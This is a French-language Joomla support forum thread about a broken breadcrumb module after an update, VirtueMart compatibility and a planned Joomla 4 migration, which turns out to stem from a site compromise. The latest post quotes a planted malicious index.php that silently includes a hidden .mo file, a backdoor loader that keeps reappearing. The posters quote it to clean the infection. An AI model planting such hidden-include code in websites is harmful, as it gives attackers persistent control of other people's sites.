fil d'ariane (mod_breadcrumbs) en fonctionne plus suite à mise à jour joomla 3.10.4

Réduire
X
 
  • Filtrer
  • Heure
  • Afficher
Tout effacer
nouveaux messages

  • RobertG
    a répondu
    Bonjour,

    Le problème de piratage n'est pas réglé, hélas. Malgré un nettoyage minutieux, des fichiers index.php sont ajoutés un peu partout, dont le but est apparemment de renommer les fichiers index.html en index.html.bak.bak
    La protection par aeSecure n'est pas efficace ici.
    Et ce matin, le site renvoie une erreur 500

    Ces fichiers index.php indésirables ont été supprimés hier après-midi après une recherche minutieuse au moyen d'un script, et les fichiers index.htm.bak.bak supprimés, avant une réinstallation des fichiers core, mais ce matin, réapparition de ces fichiers indesirables
    Un fichier index.php par exemple :
    Code PHP:
    <?php
    /*fe799*/
    @include ("/home/**********/www/administrator/components/***********/.64cf75ef.mo");
    /*fe799*/
    echo @file_get_contents('index.html.bak.bak');
    Apparemment seuls les dossiers (de premier et peut-être deuxième niveau) ne comportant pas par défaut de fichier index.php se voient ajouter un tel fichier. L'injection se fait vers 2h du matin.
    Il y a donc quelque part une taupe... sachant que le mot de passe d'accès ftp a été changé il y a quelques jours, et j'ai eu beau chercher, je n'ai pas trouvé. Une extension peut-être ?.

    Dernière édition par RobertG à 26/02/2023, 09h44

    Laisser un commentaire:


  • Pierre débutant
    a répondu
    ça y est, le problème du fil d'ariane est enfin réglé : suite à un piratage de mon site la semaine passée, et l'assistance de RobertG, nous avons remis le pack complet joomla 3.10.11, et fait de même pour tous les plugins, en rapatriant le site sur un serveur local dans un premier temps. D'autre part, nous avons nettoyé le site des fichiers malveillants (le mieux possible car il est très difficile de pouvoir tous les repérer...) : le fil d'ariane fonctionne à nouveau sur joomla et sur virtuemart.

    Laisser un commentaire:


  • Pierre débutant
    a répondu
    Bonjour,
    Voici les dernières nouvelles de mon fil d'ariane natif joomla: suite à la mise à jour en 3.10.5 de ce matin, le fil d'ariane fonctionne à nouveau SAUF sur la partie catalogue "virtuemart". Sans quoi, tout le reste s'est remis à fonctionner : le fil d'ariane pointe parfaitement tous les articles.
    J'ai tenté de désactiver les différentes options de virtuemart au niveau de la configuration des templates, qui pourraient éventuellement entrer en conflit avec le fil d'ariane (voir mon message # 38 page n° 3 du 19/12/2021), mais cela n'a apparemment aucune influence.
    Je vais tenter de voir sur le forum spécialisé de virtuemart peut-être ?
    A plus(>

    Laisser un commentaire:


  • Pierre débutant
    a répondu
    Merci pour ces précisions
    Du coup, je garde tous ces éléments de réponse "migration J!4" pour l'avenir : j'ouvrirais vraisemblablement un sujet sur le forum pour ne pas faire d'erreur lors de la création du sous-domaine test de mon site (j'ai en effet visionné chez l'hébergeur ovh, et j'ai lu pas mal de doc à ce sujet pour ouvrir un sous-domaine sur mon offre).
    Concernant le breadcrumbs, je verrais au fil des mises à jour du J!3 si le problème se résout de lui même ou bien s'il persiste, car apparemment il n'y a pas d'autres solutions à ce problème.
    Merci encore et bonne année 2022

    Laisser un commentaire:


  • RobertG
    a répondu
    Il y a quand même une certaine sécurité : tous les éléments VM sont listés comme ne permettant pas d'avoir d'info de mise à jour disponible pour J4 et l'équipe Virtuemart n'a pas mis en évidence le pack de test pour cette version.

    J'ai dit une bêtise, ils en parlent sur leur site.
    Dernière édition par RobertG à 24/12/2021, 09h54

    Laisser un commentaire:


  • dolmenhir
    a répondu
    Inutile d'aller plus vite que la musique.

    Je te déconseille vivement de faire la mise à jour vers J!4 si tu utilises Virtuemart car ce dernier n'est pas totalement compatible.
    Il est encore en phase de développement et, comme pour tout programme informatique non stable, il est déconseillé d'installer cette version sur un site en production.

    Donc prends ton mal en patience, reste sous J!3 et tu feras la mise à jour quand sortira une version stable et officielle de Virtuemart pour J!4

    Laisser un commentaire:


  • RobertG
    a répondu
    Au fait : pour faire la migration, utilise une copie de ton site, soit dans un sous-domaine de ton hébergeur (en faisant très attention à changer les préfixes des tables si tu n'as pas plus d'une base de données), soit sur un serveur local. Et une fois finalisé, le nouveau site pourra remplacer l'ancien.

    Laisser un commentaire:


  • RobertG
    a répondu
    En ce qui concerne UP, si c'est la dernière version qui est installée, elle est compatible, donc pas de problème à son niveau.
    Pour l'autre, il suffit peut-être de vérifier sur le JED, mais finalement tu l'utilises pour remplacer le breadcrumbs standard ? Si ce n'est pas le cas, tu peux le désinstaller.

    Le système de vérification ne s'appuie pas sur l'activation ou la non-activation des extensions, à ma connaissance. Et un résultat négatif veut dire qu'il n'y a pas d'information dans le fichier manifeste d'installation de l'extension permettant de savoir s'il y a une version spécifique à J4, c'est pourquoi il faut vérifier soi-même chez l'auteur ou sur le JED.

    Laisser un commentaire:


  • Pierre débutant
    a répondu
    Merci pour cette confirmation. Je ferais le ménage prochainement.
    J'ai bien lu l'ensemble de la documentation que vous m'avez fourni concernant la "mini-migration" de 3.10.4 vers 4.0.5 de J! : j'ai répondu oui à 11 questions sur 14. J'ai ensuite bien regardé le listing des modules : l'écrasante majorité des modules qui sont notés comme ne pouvant pas passer potentiellement la mini-migration sont des modules désactivés (donc je suppose que le système de listing n'a pas pu voir si la mise à jour était possible puisque désactivés, d'après ce que j'ai traduit de l'anglais d'explicatif).
    D'autre part, les 2 modules qui demandent une mise à jour sont "breadcrumbs advanced" et "up" : je peux les contacter pour voir s'ils vont ou pas se mettre à la page, et surtout quand. Pour la partie "required php and database settings", tout est en vert, pour la partie "recommended php settings", j'ai 2 voyants en orange, mais apparemment cela dépend de l'hébergeur (ovh dans mon cas)
    1) Simplement, si le breadcrumbs en l'état actuel n'est pas résolu, dois-je passer en joomla 4.0, ou dois-je attendre de l'avoir résolu ?
    2) Ou bien est-il préférable que je demande une sauvegarde à ovh du mois dernier, pour revenir à 3.10.3, retrouver mon fil d'ariane qui fonctionnait, et lancer alors la mini-migration vers 4.0.5 ?

    Laisser un commentaire:


  • RobertG
    a répondu
    Bonjour,

    Les extensions que tu as désactivées peuvent être désinstallées, puisqu'elles ne te sont pas utiles.
    En ce qui concerne Virtuemart, ne désinstalle rien, ce serait réinstallé par la prochaine mise à jour, car ces plugins de paiement font partie intégrante du pack.

    Laisser un commentaire:


  • Pierre débutant
    a répondu
    Bonjour,
    Juste pour info, j'ai sauvegardé, via sftp depuis la racine www de mon site, le "mod_breadcrumbs" natif du 22/12/2021 (version J!3.10.4), et l'ai comparé avec ma sauvegarde "mod_breadcrumbs" natif du 12/11/2021 (version J!3.10.3) : avec notepad++ > compare : tout "match", fichier après fichier. Donc la mise à jour n'a rien ajouté à ces fichiers, et aucune erreur de syntaxe ne semble présente avant / après problème breadcrumbs.

    Par rapport aux modules dont je ne me sers pas (Gantry, helix), qui sont donc désactivés depuis une petite semaine maintenant, le listing de mise à jour J!4 m'indique qu'ils ne passeront pas la mise à jour : est-il utile de les supprimer une bonne fois pour toute, ou le simple fait qu'ils soient désactivés ne causera aucun problème pour la migration ?
    Je vais prochainement joindre le forum spécifique à virtuemart, car là encore les modules désactivés du paiement en ligne par exemple ne me servent pas du tout : vais-je pouvoir les supprimer ou faudra t'il les conserver.

    S'il y a d'autres manipulations à effectuer pour remettre en marche le breadcrumbs, éliminer des erreurs, etc..., faites moi le savoir, j'essaierai de faire au mieux...
    Encore merci

    Laisser un commentaire:


  • Pierre débutant
    a répondu
    Je viens à l'instant de mettre en place le menu natif joomla, de type déroulant, grâce au suffixe css " nav-pills" : c'est vraiment impressionnant comme résultat. Je vous adresse mes félicitations, car c'est tout à fait ce que je souhaitais au départ, c'est à dire environ 10 années en arrière. Franchement, je trouve le rendu plus aérien que maximenu ck, et finalement cela ne m'a pas pris plus de 5 minutes, bien que très néophyte que je sois. Et surtout, on est sur du natif joomla moins sujet à problèmes en principe (surtout pour la future migration en J!4)

    J'ai donc purgé le cache à nouveau + Ctrl F5 (le tout en mode debug) : le breadcrumbs ne fonctionne toujours pas...
    Par contre, tout le reste fonctionne toujours impeccable.
    Dans la foulée, j'ai tout de même activé "MobilemenuCK" pour avoir un site adapté au téléphones mobiles : j'ai testé quelques pages sur le google mobile friendly test > ça marche.
    J'ai vu également, concernant virtuemart, dans l'onglet configuration > templates des élements de css / javascript, ou l'on peut activer ou non certains, comme "utiliser JQuery de virtuemart" > le petit explicatif lorsqu'on passe la souris dessus indique que l'on peut le désactiver pour éviter les conflits entre virtuemart et les templates par exemple. Voici une capture d'écran de ces options en l'état à ce jour :
    Cliquez sur l'image pour l'afficher en taille normale

Nom : css javascripts virtuemart.jpg 
Affichages : 198 
Taille : 134,6 Ko 
ID : 2035404

    Encore merci pour ce nouveau menu déroulant qui me va tout à fait

    Laisser un commentaire:


  • Pierre débutant
    a répondu
    Je viens à l'instant de terminer la phase "désactivation back-end des extensions (les unes après les autres) + CtrlF5 en front end + ré-activation", le tout en mode développeur (debug) : rien à signaler : le breadcrumbs ne fonctionne toujours pas, et aucun message d'erreur nulle part.
    Je continue prochainement en mettant en place le nouveau menu comme expliqué précédemment par vos soins pour obtenir des menus déroulants avec le natif joomla.
    Merci

    Laisser un commentaire:


  • dolmenhir
    a répondu
    Envoyé par Pierre débutant Voir le message
    1) j'ai purgé le cache : je vois que les différents éléments listés sont toujours présent après suppression, le nombre de leurs fichiers a nettement baissé pour certains
    C'est normal, le cache se reconstitue au fil des visites

    Envoyé par Pierre débutant Voir le message
    4) Pour maximenu Ck : je vais le désactiver, et remettre en place dans le template mon ancien menu réalisé simplement sous joomla, qui ne possédait pas d'onglets déroulant. J'y verrais sûrement plus clair.
    Je t'ai donné dans un message précédent la méthode pour disposer d'un menu natif horizontal qui permet également d'avoir les menus déroulants.

    Laisser un commentaire:


  • Pierre débutant
    a répondu
    Merci pour ces confirmations
    1) j'ai purgé le cache : je vois que les différents éléments listés sont toujours présent après suppression, le nombre de leurs fichiers a nettement baissé pour certains
    2) Pour virtuemart, je suis en version 3.8.8, qui d'après ce que je vois un peu partout, est bien la dernière version à jour.
    3) Concernant les désactivations, je ne désactive que les extensions dite "Site", pas "administration" ?
    4) Pour maximenu Ck : je vais le désactiver, et remettre en place dans le template mon ancien menu réalisé simplement sous joomla, qui ne possédait pas d'onglets déroulant. J'y verrais sûrement plus clair. J'ai gardé ce menu par sécurité car au départ, je ne savais pas si maximenu ck conviendrait bien au long cours...
    Cordialement,

    Laisser un commentaire:

Annonce

Réduire
Aucune annonce pour le moment.

Partenaire de l'association

Réduire

Hébergeur Web PlanetHoster
Travaille ...
X